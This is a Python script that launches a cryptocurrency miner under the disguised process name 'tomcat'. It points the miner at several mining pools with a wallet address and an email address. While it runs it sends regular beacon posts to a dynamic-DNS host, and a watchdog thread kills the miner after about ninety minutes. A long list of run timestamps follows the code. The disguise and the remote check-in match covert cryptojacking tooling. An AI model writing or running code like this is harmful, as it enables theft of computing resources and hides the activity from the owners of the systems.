import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:30:09.745567
#2018-02-17 17:18:01.791117
#2018-02-17 19:06:05.360251
#2018-02-17 20:54:03.967014
#2018-02-17 22:41:01.816065
#2018-02-18 00:25:04.062028
#2018-02-18 02:16:07.207163
#2018-02-18 04:03:02.251110
#2018-02-18 05:52:01.435669
#2018-02-18 07:42:04.310755
#2018-02-18 09:29:01.658959
#2018-02-18 11:16:07.345545
#2018-02-18 13:02:03.898372
#2018-02-18 14:50:03.956024
#2018-02-18 16:39:03.824408
#2018-02-18 18:28:06.264565
#2018-02-18 20:16:01.880761
#2018-02-18 22:01:05.608764
#2018-02-18 23:50:01.376928
#2018-02-19 01:36:06.139154
#2018-02-19 03:24:06.918873
#2018-02-19 05:09:05.674262
#2018-02-19 06:56:03.386695
#2018-02-19 08:45:02.687632
#2018-02-19 10:33:06.185852
#2018-02-19 12:21:05.988755
#2018-02-19 14:08:08.276412
#2018-02-19 15:57:01.500337
#2018-02-19 17:44:08.147274
#2018-02-19 19:33:06.093556
#2018-02-19 21:20:01.826042
#2018-02-19 23:05:09.263744
#2018-02-20 00:52:07.352839
#2018-02-20 02:41:03.731265
#2018-02-20 04:29:06.882475
#2018-02-20 06:12:08.040982
#2018-02-20 07:57:07.135985
#2018-02-20 09:42:06.010885
#2018-02-20 11:26:05.882971
#2018-02-20 13:12:09.675249
#2018-02-20 14:57:08.770457
#2018-02-20 16:43:11.199969
#2018-02-20 18:31:06.204828
#2018-02-20 20:22:04.327409
#2018-02-20 22:09:02.220184
#2018-02-20 23:49:02.016335
#2018-02-21 01:34:05.804642
#2018-02-21 03:21:05.682892
#2018-02-21 05:08:07.330057
#2018-02-21 06:56:01.380651
#2018-02-21 08:42:01.649558
#2018-02-21 10:27:04.201054
#2018-02-21 12:14:01.972736
#2018-02-21 14:02:04.133082
#2018-02-21 15:47:01.409733
#2018-02-21 17:38:04.954514
#2018-02-21 19:25:04.366298
#2018-02-21 21:13:01.270181
#2018-02-21 22:59:04.331286
#2018-02-22 00:47:03.934567
#2018-02-22 02:34:08.313418
#2018-02-22 04:20:01.338078
#2018-02-22 06:05:02.890129
#2018-02-22 07:50:04.156987
#2018-02-22 09:38:05.545637
#2018-02-22 11:22:07.723779
#2018-02-22 13:07:03.765397
#2018-02-22 14:57:01.705171
#2018-02-22 16:42:04.729355
#2018-02-22 18:27:07.565473
#2018-02-22 20:21:07.457281
#2018-02-22 22:06:07.682024
#2018-02-22 23:52:01.858310
#2018-02-23 01:41:03.785809
#2018-02-23 03:27:07.098744
#2018-02-23 05:12:06.533676
#2018-02-23 06:56:05.498571
#2018-02-23 08:44:06.773939
#2018-02-23 11:02:08.706863
#2018-02-23 12:58:02.119632
#2018-02-23 14:42:04.826303
#2018-02-23 16:30:11.599792
#2018-02-23 18:18:06.042704
#2018-02-23 20:03:01.479632
#2018-02-23 21:46:09.432707
#2018-02-23 23:39:05.863595
#2018-02-24 01:28:04.852703
#2018-02-24 03:20:05.393437
#2018-02-24 05:06:07.516393
#2018-02-24 06:55:06.104591
#2018-02-24 08:44:07.639592
#2018-02-24 10:39:06.430661
#2018-02-24 12:25:07.860000
#2018-02-24 14:19:01.919592
#2018-02-24 16:06:01.985245
#2018-02-24 17:57:01.597138
#2018-02-24 19:44:06.343377
#2018-02-24 21:30:08.874171
#2018-02-25 00:15:08.477789
#2018-02-25 04:16:02.063750
#2018-02-25 07:46:05.182177